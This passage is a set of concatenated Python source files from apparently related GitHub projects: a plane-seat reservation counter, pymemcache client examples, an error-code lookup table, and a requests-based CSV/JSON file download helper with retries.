kw["target"] = str(val)
elif opt in ("--case-insensitive"):
kw["case-insensitive"] = True
elif opt in ("--sequence"):
kw["sequence"] = str(val)
if "target" not in kw:
print("%s: Provide --target" % sys.argv[0])
print(usage)
sys.exit(2)
if "case-insensitive" not in kw:
kw["case-insensitive"] = case_insensitive
if "sequence" not in kw:
kw["sequence"] = sequence
if "matrix" not in kw:
matrix = JaggedMatrixGenerator(kw)
matrix.generate()
kw["matrix"] = JaggedMatrixGenerator.serialize(matrix.matrix)
assert "matrix" in kw
assert "target" in kw
assert "case-insensitive" in kw
plane_reservations = MatrixTransformA(kw)
plane_reservations.present_original
plane_reservations.transform()
plane_reservations.present_transformed
if __name__ == "__main__":
main()
```
|
{
"source": "jeff00seattle/plane-reservations",
"score": 4
}
|
#### File: jeff00seattle/plane-reservations/plane_reservations_A.py
```python
import sys
import getopt
import logging
class PlaneReservationsA(object):
"""Plane Reservations class
Brute force empty seats counting.
"""
_PLANE_ROW = [0, 0, 0, 2, 0, 0, 0, 0, 2, 0, 0, 0]
"""Plane Row unreserved.
0: Unreserved
1: Reserved
2: Aisle
"""
_ROW_SEAT_INDEX = {
'A': 0,
'B': 1,
'C': 2,
'D': 4,
'E': 5,
'F': 6,
'G': 7,
'H': 9,
'J': 10,
'K': 11,
}
"""Plane Seat index based only layout of _PLANE_ROW.
Key: Seating Letter
Value: Seat Index in Plane Row.
"""
@classmethod
def _generate_plane_seats(cls, N):
"""Generate all plane rows into a single list."""
return cls._PLANE_ROW * N
@staticmethod
def _row_index(res, number_of_rows):
"""Return seat index within Plane row"""
row_index = int(res[:-1]) - 1
assert row_index >= 0
assert row_index < number_of_rows
return row_index
@classmethod
def _row_seat_index(cls, res):
"""Return seat index within Plane row"""
seat = res[-1:]
assert isinstance(seat, str)
assert len(seat) == 1
row_seat_index = cls._ROW_SEAT_INDEX.get(seat, None)
assert row_seat_index is not None
return row_seat_index
@classmethod
def _parse_reservations_generator(cls, N, S):
"""Parse reservation string into a generator
of dictionary { "row": [Row Index], "seat": [Row Seat Index]}.
"""
return (
{
"row_index": cls._row_index(res, N),
"seat_index": cls._row_seat_index(res)
} for res in S.split(" ")
)
@classmethod
def _get_row_seat_offset(cls, res):
row_index = res.get("row_index", None)
assert row_index is not None
assert isinstance(row_index, int)
assert row_index >= 0
row_seat_index = res.get("seat_index", None)
assert row_seat_index is not None
assert isinstance(row_seat_index, int)
assert row_seat_index >= 0
row_seat_offset = (row_index * len(cls._PLANE_ROW)) + row_seat_index
assert row_seat_offset >= 0
return row_seat_offset
@classmethod
def _reserve_seats(cls, N, S):
"""Reserve Plane's Seats using expected number of rows and map which seats should be reserved."""
unreserved_seats = cls._generate_plane_seats(N)
reserved_seats = unreserved_seats[:]
if len(S) > 0:
for res in cls._parse_reservations_generator(N, S):
row_seat_offset = cls._get_row_seat_offset(res)
assert row_seat_offset < len(reserved_seats)
reserved_seats[row_seat_offset] = 1
return reserved_seats
@classmethod
def _find_max_number_of_grouping(cls, reserved_seats, k):
"""Find the max number of grouping of seats adjacent of length k
amoung currently reserved seats.
"""
# print(reserved_seats)
n = len(reserved_seats)
count_groups = 0
count_empty_contigous_seats = 0
i = 0
while i < n:
if reserved_seats[i] != 0:
# print('continue', i)
count_empty_contigous_seats = 0
i += 1
continue
count_empty_contigous_seats += 1
# print('empty', i, count_empty_contigous_seats)
if count_empty_contigous_seats >= k:
count_groups += 1
# print('found', i, count_groups)
if ((i + 1) % len(cls._PLANE_ROW)) == 0:
# print('new row', i)
count_empty_contigous_seats = 0
i += 1
return count_groups
@classmethod
def _pretty_print_plane_seats(cls, seats):
"""Split list of planes seats by rows.
"""
seats = ["-" if x == 2 else x for x in seats]
row_length = len(cls._PLANE_ROW)
return [seats[i:i + row_length] for i in range(0, len(seats), row_length)]
@staticmethod
def _pretty_print_2d_array(rows):
"""Pretty print plain rows with seat reservations
"""
s = [[str(e) for e in row] for row in rows]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = "\t".join("{{:{}}}".format(x) for x in lens)
table = [fmt.format(*row) for row in s]
return "\n" + "\n".join(table)
@property
def number_rows(self):
return self.__number_rows
@number_rows.setter
def number_rows(self, value):
self.__number_rows = value
@property
def verbose(self):
return self.__verbose
@verbose.setter
def verbose(self, value):
self.__verbose = value
@property
def reservations(self):
return self.__reservations
@reservations.setter
def reservations(self, value):
self.__reservations = value
@property
def grouping(self):
return self.__grouping
@grouping.setter
def grouping(self, value):
self.__grouping = value
@property
def logger(self):
return self.__logger
@logger.setter
def logger(self, value):
self.__logger = value
def _logger_config(self):
"""Logger config"""
self.logger = logging.getLogger("Plane Reservation")
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO)
if self.verbose:
self.logger.setLevel(logging.DEBUG)
#
# Initialize
#
def __init__(self, kw):
"""Initialize
"""
self.number_rows = kw.get("number-rows")
self.reservations = kw.get("reservations", "")
self.grouping = kw.get("grouping", "")
self.verbose = kw.get("verbose", False)
self._logger_config()
def reserve_seats(self):
"""Reserve Seats"""
cls = self.__class__
self.reserved_seats = cls._reserve_seats(self.number_rows, self.reservations)
self.logger.info("Plane Rows Reserved: {0}".format(
cls._pretty_print_2d_array(
cls._pretty_print_plane_seats(self.reserved_seats)
)
)
)
def max_grouping(self):
"""Group"""
cls = self.__class__
max_grouping_count = cls._find_max_number_of_grouping(self.reserved_seats , self.grouping)
self.logger.info("Seat Grouping By {0}: Max Number = {1}".format(self.grouping, max_grouping_count))
def main():
reservations = ""
grouping = 1
usage = ("""Usage: {0}
[-v | --verbose]
[-h | --help]
--number-rows int
--reservations string
--grouping number int
--number-rows: Number of Rows [Required]
--reservations: Seat reservations, example '1F 2A 1G 2E 3D 3F', default '{1}'
--grouping: Seat grouping, default '{2}'
""").format(sys.argv[0], reservations, grouping)
try:
opts, args = getopt.getopt(
sys.argv[1:],
"hv",
["help", "verbose", "number-rows=", "reservations=", "grouping="])
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
print(usage)
sys.exit(1)
kw = {}
for opt, val in opts:
if opt in ("-v", "--verbose"):
kw["verbose"] = True
elif opt in ("-h", "--help"):
print(usage)
sys.exit(0)
elif opt in ("--number-rows"):
kw["number-rows"] = int(val)
elif opt in ("--reservations"):
kw["reservations"] = str(val)
elif opt in ("--grouping"):
kw["grouping"] = int(val)
if "number-rows" not in kw:
print("%s: Provide --number-rows" % sys.argv[0])
print(usage)
sys.exit(2)
elif "number-rows" in kw and kw["number-rows"] <= 0:
print("%s: Provide valid --number-rows" % sys.argv[0])
print(usage)
sys.exit(2)
if "reservations" not in kw:
kw["reservations"] = reservations
elif "reservations" in kw and len(kw["reservations"]) == 0:
print("%s: Provide valid --reservations" % sys.argv[0])
print(usage)
sys.exit(2)
if "grouping" not in kw:
kw["grouping"] = grouping
elif "grouping" in kw and kw["grouping"] <= 0:
print("%s: Provide valid --grouping" % sys.argv[0])
print(usage)
sys.exit(2)
assert "number-rows" in kw
assert "reservations" in kw
assert "grouping" in kw
assert kw["number-rows"] > 0
plane_reservations = PlaneReservationsA(kw)
plane_reservations.reserve_seats()
plane_reservations.max_grouping()
if __name__ == "__main__":
main()
```
|
{
"source": "jeff00seattle/pyfortified-cache",
"score": 3
}
|
#### File: pyfortified-cache/examples/example_pymemcache_client.py
```python
import os
import sys
from pprintpp import pprint
import socket
from pymemcache_client import (
PymemcacheClient
)
host = socket.gethostbyname("localhost")
def example_pymemcache_client_none():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pymemcache_client = PymemcacheClient(config=None)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def example_pymemcache_client_basic():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
config = {
"servers": [{"host": "localhost", "port": 11211}],
"client_type": "basic"
}
pymemcache_client = PymemcacheClient(config=config)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def example_pymemcache_client_hash():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
config = {
"servers": [{"host": "localhost", "port": 11211}],
"client_type": "hash"
}
pymemcache_client = PymemcacheClient(config=config)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def example_pymemcache_client_file():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
full_path = os.path.realpath(__file__)
path = os.path.dirname(full_path)
config_file = "{}/resources/example_pymemcache.json".format(path)
pymemcache_client = PymemcacheClient(config_file=config_file)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def main():
example_pymemcache_client_none()
example_pymemcache_client_basic()
example_pymemcache_client_hash()
example_pymemcache_client_file()
if __name__ == '__main__':
sys.exit(main())
```
#### File: pyfortified-cache/pyfortified_cache/cache_types.py
```python
class CacheTypes(object):
"""Cache Types ENUM
"""
UNDEFINED = None
MEMCACHED_CACHE = 'Memcached'
@staticmethod
def validate(cache_type):
return cache_type in [
CacheTypes.MEMCACHED_CACHE,
]
```
|
{
"source": "jeff00seattle/requests-fortified",
"score": 2
}
|
#### File: pyfortified_requests/errors/error_desc.py
```python
from pyhttpstatus_utils import HTTP_STATUS_DESC_DICT
from pyhttpstatus_utils import HTTP_STATUS_PHRASE_DICT
REQUESTS_FORTIFIED_ERROR_NAME_DICT = {
-1: 'Unassigned',
0: 'Success',
600: 'Module Error',
601: 'Argument Error',
602: 'Request Error',
603: 'Software Error',
604: 'Unexpected Value',
605: 'Request HTTP',
606: 'Request Connect',
607: 'Request Redirect',
608: 'Retry Exhausted',
609: 'Unexpected content-type returned',
610: 'Upload Data Error',
611: 'Auth Error',
612: 'Auth JSON Error',
613: 'Auth Response Error',
614: 'JSON Decoding Error',
699: 'Unexpected Error'
}
REQUESTS_FORTIFIED_ERROR_DESC_DICT = {
-1: 'Unassiged exit condition',
0: 'Successfully completed',
600: 'Error occurred somewhere within module',
601: 'Invalid or missing argument provided',
602: 'Unexpected request failure',
603: 'Unexpected software error was detected',
604: 'Unexpected value returned',
605: 'Request HTTP error occurred',
606: 'Request Connection error occurred',
607: 'Request Redirect',
608: 'Retry Exhausted',
609: 'Unexpected content-type returned',
610: 'Upload Data Error',
611: 'Auth Error',
612: 'Auth JSON Error',
613: 'Auth Response Error',
614: 'JSON Decoding Error',
699: 'Unexpected Error'
}
def error_name(error_code, return_bool=False):
"""Provide definition of Error Code
Args:
error_code:
Returns:
"""
if error_code is None or not isinstance(error_code, int):
return "Error Code: Invalid Type: %d" % error_code
exit_code_name_ = HTTP_STATUS_PHRASE_DICT.get(error_code, None)
if exit_code_name_ is not None:
return exit_code_name_
exit_code_name_ = REQUESTS_FORTIFIED_ERROR_NAME_DICT.get(error_code, None)
if exit_code_name_ is not None:
return exit_code_name_
return False if return_bool else "Error Code: Undefined: %d" % error_code
def error_desc(error_code, return_bool=False):
"""Provide definition of Error Code
Args:
error_code:
Returns:
"""
if error_code is None or not isinstance(error_code, int):
return "Error Code: Invalid Type: %d" % error_code
exit_code_description_ = HTTP_STATUS_DESC_DICT.get(error_code, None)
if exit_code_description_ is not None:
return exit_code_description_
exit_code_description_ = REQUESTS_FORTIFIED_ERROR_DESC_DICT.get(error_code, None)
if exit_code_description_ is not None:
return exit_code_description_
return False if return_bool else "Error Code: Undefined: %d" % error_code
```
#### File: requests-fortified/pyfortified_requests/pyfortified_requests_download.py
```python
import logging
import csv
import datetime as dt
import gzip
import http.client as http_client
import io
import ujson as json
import os
import re
import time
import requests
from pyfortified_logging import (LoggingFormat, LoggingOutput)
from pprintpp import pprint
from pyfortified_requests import (__python_required_version__)
from pyfortified_requests.errors import (get_exception_message, RequestsFortifiedErrorCodes)
from pyfortified_requests.exceptions.custom import (
RequestsFortifiedModuleError,
)
from pyfortified_requests.support import (
base_class_name,
bytes_to_human,
csv_skip_last_row,
detect_bom,
env_usage,
handle_json_decode_error,
python_check_version,
remove_bom,
validate_response,
)
from pyfortified_requests.support.curl import command_line_request_curl
from .pyfortified_requests import (RequestsFortified)
from safe_cast import safe_dict
log = logging.getLogger(__name__)
python_check_version(__python_required_version__)
class RequestsFortifiedDownload(object):
__requests_client = None
def __init__(
self,
logger_level=logging.INFO,
logger_format=LoggingFormat.JSON,
logger_output=LoggingOutput.STDOUT_COLOR,
requests_client=None,
):
self.requests_client = RequestsFortified(
logger_format=logger_format,
logger_level=logger_level,
logger_output=logger_output,
requests_client=requests_client
)
@property
def logger(self):
return self.requests_client.logger
@property
def session(self):
return self.requests_client.session
@property
def requests_session_client(self):
return self.requests_client.requests_session_client
@property
def requests_client(self):
return self.__requests_client
@requests_client.setter
def requests_client(self, value):
self.__requests_client = value
def request(self, **kwargs):
return self.requests_client.request(**kwargs)
@property
def built_request_curl(self):
return self.requests_client.built_request_curl
def request_csv_download(
self,
request_method,
request_url,
tmp_csv_file_name,
tmp_directory,
request_params=None,
request_data=None,
request_retry=None,
request_retry_func=None,
request_retry_excps=None,
request_retry_http_status_codes=None,
request_retry_excps_func=None,
request_headers=None,
request_auth=None,
request_label=None,
build_request_curl=True,
allow_redirects=True,
verify=True,
skip_first_row=False,
skip_last_row=False,
read_first_row=False,
csv_delimiter=',',
csv_header=None,
encoding_write=None,
encoding_read=None,
decode_unicode=False,
):
"""Download and Read CSV file.
Args:
request_method: request_method for the new :class:`Request` object.
request_url: URL for the new :class:`Request` object.
tmp_csv_file_name: Provide temporary name for downloaded CSV
tmp_directory: Provide temporary directory to hold downloaded CSV
request_params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
request_data: (optional) Dictionary, bytes, or file-like object to
send in the body of the :class:`Request`.
request_retry: (optional) Retry configuration.
request_headers: (optional) Dictionary of HTTP Headers to
send with the :class:`Request`.
request_auth: (optional) Auth tuple to enable
Basic/Digest/Custom HTTP Auth.
allow_redirects: (optional) Boolean. Set to True if
POST/PUT/DELETE redirect following is allowed.
verify: (optional) whether the SSL cert will be verified. A
CA_BUNDLE path can also be provided. Defaults to ``True``.
skip_first_row: (optional) Skip first row if it does not contain
column headers.
skip_last_row: (optional) Skip first row if it does not contain
column values.
read_first_row: (optional) Read first row separate from data returned.
csv_delimiter: (optional) Delimiter character, default comma ','.
csv_header:
encoding_write:
encoding_read:
decode_unicode:
Returns:
Generator containing CSV data by rows in JSON dictionary format.
"""
_request_label = 'Request Download CSV File'
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.debug(
"{0}: Start".format(request_label),
extra={
'request_url': request_url,
'encoding_write': encoding_write,
'encoding_read': encoding_read,
}
)
timer_start = dt.datetime.now()
_attempts = 0
_tries = 60
_delay = 10
while _tries:
_attempts += 1
log.info(
"{0}: Attempt: {1}".format(request_label, _attempts),
extra={
'request_url': request_url,
}
)
response = self.requests_client.request(
request_method=request_method,
request_url=request_url,
request_params=request_params,
request_data=request_data,
request_retry=request_retry,
request_retry_func=request_retry_func,
request_retry_excps=request_retry_excps,
request_retry_http_status_codes=request_retry_http_status_codes,
request_retry_excps_func=request_retry_excps_func,
request_headers=request_headers,
request_auth=request_auth,
build_request_curl=build_request_curl,
allow_redirects=allow_redirects,
verify=verify,
stream=True,
request_label=request_label
)
if response is None:
log.error(
"{0}: No response".format(request_label),
extra={
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: No response".format(request_label),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_REQUEST,
)
http_status_code = response.status_code
timer_end = dt.datetime.now()
timer_delta = timer_end - timer_start
response_time_secs = timer_delta.seconds
response_headers = None
if hasattr(response, 'headers'):
response_headers = \
json.loads(
json.dumps(
dict(response.headers)
)
)
log.debug(
"{0}: Response Status".format(request_label),
extra={
'http_status_code': http_status_code,
'response_time_secs': response_time_secs,
'response_url': response.url,
'response_headers': safe_dict(response_headers),
}
)
(tmp_csv_file_path, tmp_csv_file_size) = self.download_csv(
response,
tmp_directory,
tmp_csv_file_name,
request_label=request_label,
encoding_write=encoding_write,
decode_unicode=decode_unicode
)
if tmp_csv_file_path is not None:
break
_tries -= 1
if not _tries:
log.error(
"{0}: Exhausted Retries".format(request_label),
extra={
'tries': _tries,
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Exhausted Retries".format(request_label),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_RETRY_EXHAUSTED
)
log.info(
"{0}: Performing Retry".format(request_label),
extra={
'tries': _tries,
'delay': _delay,
'request_url': request_url,
}
)
time.sleep(_delay)
log.info(
"{0}: Finished".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'file_size': bytes_to_human(tmp_csv_file_size),
'encoding_read': encoding_read,
}
)
log.debug(
"{0}: Usage".format(request_label),
extra=env_usage(tmp_directory),
)
with open(file=tmp_csv_file_path, mode='r', encoding=encoding_read) as csv_file_r:
if read_first_row:
csv_report_name = csv_file_r.readline()
csv_report_name = re.sub('\"', '', csv_report_name)
csv_report_name = re.sub('\n', '', csv_report_name)
log.info(
"{0}: Report".format(request_label),
extra={'csv_report_name': csv_report_name},
)
elif skip_first_row:
next(csv_file_r)
csv_file_header = next(csv_file_r)
csv_header_actual = \
[h.strip() for h in csv_file_header.split(csv_delimiter)]
csv_header_hr = []
index = 0
for column_name in csv_header_actual:
csv_header_hr.append({'index': index, 'name': column_name})
index += 1
log.debug(
"{0}: Content Header".format(request_label),
extra={'csv_header': csv_header_hr},
)
csv_fieldnames = csv_header if csv_header else csv_header_actual
csv_dict_reader = csv.DictReader(csv_file_r, fieldnames=csv_fieldnames, delimiter=csv_delimiter)
if skip_last_row:
for row in csv_skip_last_row(csv_dict_reader):
yield row
else:
for row in csv_dict_reader:
yield row
def request_json_download(
self,
request_method,
request_url,
tmp_json_file_name,
tmp_directory,
request_params=None,
request_data=None,
request_retry=None,
request_retry_func=None,
request_retry_excps=None,
request_retry_excps_func=None,
request_headers=None,
request_auth=None,
request_label=None,
build_request_curl=False,
allow_redirects=True,
verify=True,
encoding_write=None,
encoding_read=None,
):
"""Download and Read JSON file.
Args:
request_method: request_method for the new :class:`Request` object.
request_url: URL for the new :class:`Request` object.
tmp_json_file_name: Provide temporary name for downloaded CSV
tmp_directory: Provide temporary directory to hold downloaded CSV
request_params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
request_data: (optional) Dictionary, bytes, or file-like object to
send in the body of the :class:`Request`.
request_retry: (optional) Retry configuration.
request_headers: (optional) Dictionary of HTTP Headers to
send with the :class:`Request`.
request_auth: (optional) Auth tuple to enable
Basic/Digest/Custom HTTP Auth.
build_request_curl: (optional) Build a copy-n-paste curl for command line
that provides same request as this call.
allow_redirects: (optional) Boolean. Set to True if
POST/PUT/DELETE redirect following is allowed.
verify: (optional) whether the SSL cert will be verified. A
CA_BUNDLE path can also be provided. Defaults to ``True``.
encoding_write:
encoding_read:
decode_unicode:
Returns:
Generator containing JSON data by rows in JSON dictionary format.
"""
_request_label = "Request Download JSON File"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.info(
"{0}: Start".format(request_label),
extra={
'request_url': request_url,
'encoding_write': encoding_write,
'encoding_read': encoding_read,
}
)
timer_start = dt.datetime.now()
_attempts = 0
_tries = 60
_delay = 10
while _tries:
_attempts += 1
log.debug(
"{0}: Download".format(request_label),
extra={
'attempts': _attempts,
'request_url': request_url,
}
)
response = self.requests_client.request(
request_method=request_method,
request_url=request_url,
request_params=request_params,
request_data=request_data,
request_retry=request_retry,
request_retry_func=request_retry_func,
request_retry_excps=request_retry_excps,
request_retry_excps_func=request_retry_excps_func,
request_headers=request_headers,
request_auth=request_auth,
build_request_curl=build_request_curl,
allow_redirects=allow_redirects,
verify=verify,
stream=True,
request_label=request_label
)
if response is None:
log.error(
"{0}: No response".format(request_label),
extra={
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: No response".format(request_label),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_REQUEST
)
http_status_code = response.status_code
timer_end = dt.datetime.now()
timer_delta = timer_end - timer_start
response_time_secs = timer_delta.seconds
response_headers = None
if hasattr(response, 'headers'):
response_headers = \
json.loads(
json.dumps(
dict(response.headers)
)
)
log.debug(
"{0}: Response Status".format(request_label),
extra={
'http_status_code': http_status_code,
'response_time_secs': response_time_secs,
'response_url': response.url,
'response_headers': safe_dict(response_headers),
}
)
if not os.path.exists(tmp_directory):
os.mkdir(tmp_directory)
tmp_json_file_path = "{0}/{1}".format(tmp_directory, tmp_json_file_name)
if os.path.exists(tmp_json_file_path):
log.debug(
"{0}: Removing".format(request_label),
extra={'file_path': tmp_json_file_path},
)
os.remove(tmp_json_file_path)
mode_write = 'wb' if encoding_write is None else 'w'
log.debug(
"{0}: Finished".format(request_label),
extra={
'file_path': tmp_json_file_path,
'mode_write': mode_write,
'encoding_write': encoding_write,
}
)
log.debug(
"{0}: Usage".format(request_label),
extra=env_usage(tmp_directory)
)
chunk_total_sum = 0
with open(file=tmp_json_file_path, mode=mode_write, encoding=encoding_write) as json_raw_file_w:
log.debug(
"{0}: Response Raw: Started".format(request_label),
extra={
'file_path': tmp_json_file_path,
}
)
_tries -= 1
error_exception = None
error_details = None
chunk_size = 8192
try:
raw_response = response.raw
while True:
chunk = raw_response.read(chunk_size, decode_content=True)
if not chunk:
break
chunk_total_sum += chunk_size
json_raw_file_w.write(chunk)
json_raw_file_w.flush()
os.fsync(json_raw_file_w.fileno())
log.debug(
"{0}: By Chunk: Completed".format(request_label),
extra={
'file_path': tmp_json_file_path,
}
)
break
except requests.exceptions.ChunkedEncodingError as chunked_encoding_ex:
error_exception = base_class_name(chunked_encoding_ex)
error_details = get_exception_message(chunked_encoding_ex)
log.warning(
"{0}: Error: {1}".format(request_label, error_exception),
extra={
'error_details': error_details,
'chunk_total_sum': chunk_total_sum,
}
)
if not _tries:
log.error(
"{0}: Exhausted Retries: Error: {1}".format(request_label, error_exception),
)
raise
except http_client.IncompleteRead as incomplete_read_ex:
error_exception = base_class_name(incomplete_read_ex)
error_details = get_exception_message(incomplete_read_ex)
log.warning(
"{0}: IncompleteRead".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
'chunk_total_sum': chunk_total_sum,
}
)
if not _tries:
log.error(
"{0}: Exhausted Retries: Error: {1}".format(request_label, error_exception),
)
raise
except requests.exceptions.RequestException as request_ex:
log.error(
"{0}: Request Exception".format(request_label),
extra={
'error_exception': base_class_name(request_ex),
'error_details': get_exception_message(request_ex),
'chunk_total_sum': chunk_total_sum,
}
)
raise
except Exception as ex:
log.error(
"{0}: Unexpected Exception".format(request_label),
extra={
'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex),
'chunk_total_sum': chunk_total_sum,
}
)
raise
if not _tries:
log.error(
"{0}: Exhausted Retries".format(request_label),
extra={
'tries': _tries,
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Exhausted Retries: {1}".format(request_label, request_url),
error_request_curl=self.built_request_curl,
error_code=RequestsFortifiedErrorCodes.REQ_ERR_RETRY_EXHAUSTED
)
log.info(
"{0}: Performing Retry".format(request_label),
extra={
'tries': _tries,
'delay': _delay,
'request_url': request_url,
}
)
time.sleep(_delay)
tmp_json_file_size = os.path.getsize(tmp_json_file_path)
bom_enc, bom_len, bom_header = detect_bom(tmp_json_file_path)
log.info(
"{0}: By Chunk: Completed: Details".format(request_label),
extra={
'file_path': tmp_json_file_path,
'file_size': bytes_to_human(tmp_json_file_size),
'chunk_total_sum': chunk_total_sum,
'bom_encoding': bom_enc,
}
)
if bom_enc == 'gzip':
tmp_json_gz_file_path = "%s.gz" % tmp_json_file_path
os.rename(src=tmp_json_file_path, dst=tmp_json_gz_file_path)
with open(file=tmp_json_file_path, mode=mode_write, encoding=encoding_write) as json_file_w:
log.debug(
"{0}: GZip: Started".format(request_label),
extra={
'file_path': tmp_json_file_path,
}
)
with gzip.open(tmp_json_gz_file_path, 'r') as gzip_file_r:
json_file_w.write(gzip_file_r.read())
response_extra = {
'file_path': tmp_json_file_path,
'file_size': bytes_to_human(tmp_json_file_size),
}
log.info(
"{0}: Read Downloaded".format(request_label),
extra=response_extra
)
json_download = None
with open(tmp_json_file_path, mode='r') as json_file_r:
json_file_content = json_file_r.read()
try:
json_download = json.loads(json_file_content)
except ValueError as json_decode_ex:
pprint(json_file_content)
response_extra.update({
'json_file_content': json_file_content,
'json_file_content_len': len(json_file_content)
})
handle_json_decode_error(
response_decode_ex=json_decode_ex,
response=response,
response_extra=response_extra,
request_label=request_label,
request_curl=self.built_request_curl
)
except Exception as ex:
pprint(json_file_content)
response_extra.update({
'json_file_content': json_file_content,
'json_file_content_len': len(json_file_content)
})
log.error(
"{0}: Failed: Exception".format(request_label),
extra=response_extra,
)
handle_json_decode_error(
response_decode_ex=ex,
response=response,
response_extra=response_extra,
request_label=request_label,
request_curl=self.built_request_curl
)
response_extra.update({'json_file_content_len': len(json_download)})
log.info(
"{0}: Finished".format(request_label),
extra=response_extra
)
return json_download
def download_csv(
self,
response,
tmp_directory,
tmp_csv_file_name,
request_label=None,
encoding_write=None,
decode_unicode=False,
):
_request_label = "Download CSV"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.debug(
"{0}: Start".format(request_label)
)
if not os.path.exists(tmp_directory):
os.mkdir(tmp_directory)
tmp_csv_file_path = "{0}/{1}".format(tmp_directory, tmp_csv_file_name)
if os.path.exists(tmp_csv_file_path):
log.debug(
"{0}: Removing previous CSV".format(request_label),
extra={'file_path': tmp_csv_file_path},
)
os.remove(tmp_csv_file_path)
mode_write = 'wb' if encoding_write is None else 'w'
log.debug(
"{0}: Details".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'mode_write': mode_write,
'encoding_write': encoding_write,
}
)
chunk_total_sum = 0
with open(file=tmp_csv_file_path, mode=mode_write, encoding=encoding_write) as csv_file_wb:
log.debug(
"{0}: By Chunk: Started".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'request_label': request_label
}
)
error_exception = None
error_details = None
try:
for chunk in response.iter_content(chunk_size=8192, decode_unicode=decode_unicode):
if not chunk:
break
chunk_total_sum += 8192
csv_file_wb.write(chunk)
csv_file_wb.flush()
os.fsync(csv_file_wb.fileno())
log.debug(
"{0}: By Chunk: Completed".format(request_label),
extra={
'file_path': tmp_csv_file_path,
}
)
except requests.exceptions.ChunkedEncodingError as chunked_encoding_ex:
error_exception = base_class_name(chunked_encoding_ex)
error_details = get_exception_message(chunked_encoding_ex)
log.warning(
"{0}: ChunkedEncodingError".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
return (None, 0)
except http_client.IncompleteRead as incomplete_read_ex:
error_exception = base_class_name(incomplete_read_ex)
error_details = get_exception_message(incomplete_read_ex)
log.warning(
"{0}: IncompleteRead".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
return (None, 0)
except requests.exceptions.RequestException as request_ex:
log.error(
"{0}: Request Exception".format(request_label),
extra={
'error_exception': base_class_name(request_ex),
'error_details': get_exception_message(request_ex),
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
raise
except Exception as ex:
